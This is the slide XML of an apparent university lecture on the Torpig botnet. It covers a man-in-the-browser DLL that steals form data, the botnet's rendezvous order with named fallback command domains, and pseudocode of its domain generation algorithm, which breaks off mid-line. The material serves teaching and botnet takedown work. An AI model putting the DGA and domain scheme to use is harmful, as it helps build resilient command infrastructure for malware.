            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Researchers Infiltrated Here</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8092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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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3"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96381"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monster-in-the-Browser Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="D:\Classes\CS 4700\assets\torpi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037" y="1113972"/>
            <a:ext cx="7969251" cy="5689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ular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8891724" y="404447"/>
            <a:ext cx="2924832" cy="1419049"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 85326"/>
              <a:gd name="adj2" fmla="val 216880"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DA1F28"/>
          </a:solidFill>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="DA1F28">
                <a:lumMod val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injected DLL steals information entered into forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318569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04456-FA3B-497C-843B-B9EF2080DDDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Torpig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Rendezvous Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E5F57A3-6297-4280-87AB-9484B88287DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to connect to a computed a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>weekly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Append a list of TLDs, in order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: adlfn.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>adlfn.net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>adlfn.biz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to connect to a computed a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>daily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same list of TLDs, in order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to connect to a hardcoded list of fallback domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rikora.com, pinakola.com, and flippibi.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First successful connection wins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whitehat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> owns the weekly .com domain, they win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89691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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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8" end="8"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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17D72-8E6F-42E3-87EF-BAF90262C5F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Generation Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3B7EB9A-23AF-4C59-842D-83C5169782E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="10515600" cy="5088484"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>suffix = ["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>anj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "arm", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aym</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ulj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_daily_domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetLocalTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(), 8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scramble_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(t, p):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return (((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ^ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) * p) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.year</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>generate_domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(t, p):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; 2007: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scramble_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(t, p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    c1 = (((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;&gt; 2) &amp; 0x3fc0) + s) % 25 + ’a’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    c2 = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + s) % 10 + ’a’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    c3 = ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.year</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &amp; 0xff) + s) % 25 + ’a’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * 2 &lt; ’0’ or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * 2 &gt; ’9’: c4 = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * 2) % 25 + ’a’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    else: c4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> % 10 + ’1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return c1 + ’h’ + c2 + c3 + ’x’ + c4 + suffix[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>t.month</a:t>
            </a:r>
            <a:r>
